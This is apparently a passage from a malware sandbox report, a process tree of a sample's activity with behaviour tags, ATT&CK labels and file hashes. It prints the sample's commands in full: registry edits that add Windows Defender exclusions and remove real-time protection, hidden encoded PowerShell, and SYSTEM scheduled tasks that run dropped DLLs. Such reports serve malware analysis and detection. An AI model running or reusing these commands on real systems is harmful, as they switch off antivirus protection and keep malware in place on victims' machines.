                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jbJDvxQypZFbaJytP" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                        • Windows security bypass
                                                        PID:988
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dvCPKpbdOyEnPlbQ" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                        • Windows security bypass
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2348
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dvCPKpbdOyEnPlbQ" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                        • Windows security bypass
                                                        PID:1072
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EiOFWbnFxWLNFdZXKhR" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1692
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EiOFWbnFxWLNFdZXKhR" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                          PID:2684
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NeZWLpfMAhqU2" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3060
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NeZWLpfMAhqU2" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:2784
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eOISJpbOU" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:2632
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eOISJpbOU" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2616
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\khqZzjjJsExFC" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                                PID:2708
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\khqZzjjJsExFC" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                  PID:2580
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wHBDKkBCrjUn" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                    PID:2652
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wHBDKkBCrjUn" /t REG_DWORD /d 0 /reg:64
                                                                    4⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2644
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\vNwAEuYqEraFXGVB" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                      PID:2236
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\vNwAEuYqEraFXGVB" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2888
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2872
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                        PID:2508
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jbJDvxQypZFbaJytP" /t REG_DWORD /d 0 /reg:32
                                                                        4⤵
                                                                          PID:3064
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jbJDvxQypZFbaJytP" /t REG_DWORD /d 0 /reg:64
                                                                          4⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2880
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dvCPKpbdOyEnPlbQ" /t REG_DWORD /d 0 /reg:32
                                                                          4⤵
                                                                            PID:2800
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dvCPKpbdOyEnPlbQ" /t REG_DWORD /d 0 /reg:64
                                                                            4⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:2840
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gsdheDlDo" /SC once /ST 15:20:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2424
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gsdheDlDo"
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:1640
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /DELETE /F /TN "gsdheDlDo"
                                                                          3⤵
                                                                            PID:2444
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                            3⤵
                                                                              PID:1528
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                4⤵
                                                                                  PID:2112
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                3⤵
                                                                                  PID:716
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                    4⤵
                                                                                      PID:268
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /CREATE /TN "NYjUQBelwXgYOLeVD" /SC once /ST 12:04:10 /RU "SYSTEM" /TR "\"C:\Windows\Temp\dvCPKpbdOyEnPlbQ\PNhwvUTleCiNlqU\HPSgsiX.exe\" w5 /oXSydidCZ 525403 /S" /V1 /F
                                                                                    3⤵
                                                                                    • Drops file in Windows directory
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:1560
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /run /I /tn "NYjUQBelwXgYOLeVD"
                                                                                    3⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2040
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 608
                                                                                    3⤵
                                                                                    • Loads dropped DLL
                                                                                    • Program crash
                                                                                    PID:1136
                                                                                • C:\Windows\Temp\dvCPKpbdOyEnPlbQ\PNhwvUTleCiNlqU\HPSgsiX.exe
                                                                                  C:\Windows\Temp\dvCPKpbdOyEnPlbQ\PNhwvUTleCiNlqU\HPSgsiX.exe w5 /oXSydidCZ 525403 /S
                                                                                  2⤵
                                                                                  • Checks computer location settings
                                                                                  • Executes dropped EXE
                                                                                  • Drops Chrome extension
                                                                                  • Drops file in System32 directory
                                                                                  • Drops file in Program Files directory
                                                                                  • Modifies data under HKEY_USERS
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:2476
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                    3⤵
                                                                                      PID:1648
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                        4⤵
                                                                                        • Indirect Command Execution
                                                                                        PID:2060
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                          5⤵
                                                                                            PID:2988
                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                              6⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:2552
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                          4⤵
                                                                                          • Indirect Command Execution
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:1740
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                            5⤵
                                                                                              PID:1748
                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                6⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:1624
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                            4⤵
                                                                                            • Indirect Command Execution
                                                                                            PID:2252
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                              5⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:604
                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                6⤵
                                                                                                  PID:1184
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                              4⤵
                                                                                              • Indirect Command Execution
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:300
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                5⤵
                                                                                                  PID:2324
                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                    6⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:1504
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                4⤵
                                                                                                • Indirect Command Execution
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2292
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                  5⤵
                                                                                                    PID:1684
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2244
                                                                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                        7⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:2500
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /DELETE /F /TN "bbihiUuOAZYUglmJTV"
                                                                                                3⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:1892
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                3⤵
                                                                                                  PID:496
                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                    4⤵
                                                                                                    • Indirect Command Execution
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:828
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      5⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:2816
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        6⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1944
                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                          7⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2580
                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                    4⤵
                                                                                                    • Indirect Command Execution
                                                                                                    PID:2808
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                      5⤵
                                                                                                        PID:1824
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                          6⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Drops file in System32 directory
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2704
                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                            7⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:1340
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\eOISJpbOU\pcrNYj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "mMdToihWYvazTfc" /V1 /F
                                                                                                    3⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:2968
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "mMdToihWYvazTfc2" /F /xml "C:\Program Files (x86)\eOISJpbOU\dqQRFsR.xml" /RU "SYSTEM"
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:300
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /END /TN "mMdToihWYvazTfc"
                                                                                                    3⤵
                                                                                                      PID:2096
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /DELETE /F /TN "mMdToihWYvazTfc"
                                                                                                      3⤵
                                                                                                        PID:2244
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "MOVjujUTKKpizM" /F /xml "C:\Program Files (x86)\NeZWLpfMAhqU2\komLPDR.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:924
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "KoccOURVwTvfh2" /F /xml "C:\ProgramData\vNwAEuYqEraFXGVB\TWWydLB.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1224
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "aOeZmOrVSqitQmAUa2" /F /xml "C:\Program Files (x86)\EiOFWbnFxWLNFdZXKhR\JbcaXZx.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2132
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "JnRatFBDjiCGOcAtIXG2" /F /xml "C:\Program Files (x86)\khqZzjjJsExFC\KjmwisG.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2756
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "EfjSyKVAObOKvfete" /SC once /ST 05:01:38 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\dvCPKpbdOyEnPlbQ\numGTjNr\JpRXKZe.dll\",#1 /vydidyerF 525403" /V1 /F
                                                                                                        3⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1164
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /run /I /tn "EfjSyKVAObOKvfete"
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1724
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /DELETE /F /TN "NYjUQBelwXgYOLeVD"
                                                                                                        3⤵
                                                                                                          PID:2508
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 1556
                                                                                                          3⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Program crash
                                                                                                          PID:2000
                                                                                                      • C:\Windows\system32\rundll32.EXE
                                                                                                        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dvCPKpbdOyEnPlbQ\numGTjNr\JpRXKZe.dll",#1 /vydidyerF 525403
                                                                                                        2⤵
                                                                                                          PID:1440
                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                            C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dvCPKpbdOyEnPlbQ\numGTjNr\JpRXKZe.dll",#1 /vydidyerF 525403
                                                                                                            3⤵
                                                                                                            • Blocklisted process makes network request
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Loads dropped DLL
                                                                                                            • Drops file in System32 directory
                                                                                                            • Enumerates system info in registry
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:2288
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /DELETE /F /TN "EfjSyKVAObOKvfete"
                                                                                                              4⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:756
                                                                                                      • C:\Windows\system32\taskeng.exe
                                                                                                        taskeng.exe {4B6D6D0F-1B7E-4CD9-8900-C67228ECA805} S-1-5-21-3294248377-1418901787-4083263181-1000:FMEDFXFE\Admin:Interactive:[1]
                                                                                                        1⤵
                                                                                                          PID:1056
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                            2⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Drops file in System32 directory
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:636
                                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                              3⤵
                                                                                                                PID:2536
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                              2⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Drops file in System32 directory
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:736
                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                3⤵
                                                                                                                  PID:1168
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                2⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Drops file in System32 directory
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1512
                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                  3⤵
                                                                                                                    PID:1660
                                                                                                              • C:\Windows\system32\gpscript.exe
                                                                                                                gpscript.exe /RefreshSystemParam
                                                                                                                1⤵
                                                                                                                  PID:988
                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                  1⤵
                                                                                                                    PID:2340
                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                    1⤵
                                                                                                                      PID:3012

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\Program Files (x86)\EiOFWbnFxWLNFdZXKhR\JbcaXZx.xml

                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      e63d2913c2c7c0149fc3c9ec6e2ccd6b

                                                                                                                      SHA1

                                                                                                                      65ed1dc374cbc8a9454497629deb1de0856b249d

                                                                                                                      SHA256

                                                                                                                      a1df6dbc913a93533607d1e72ec63e107a619da0eab2d3e914b4c0725b3c7034

                                                                                                                      SHA512

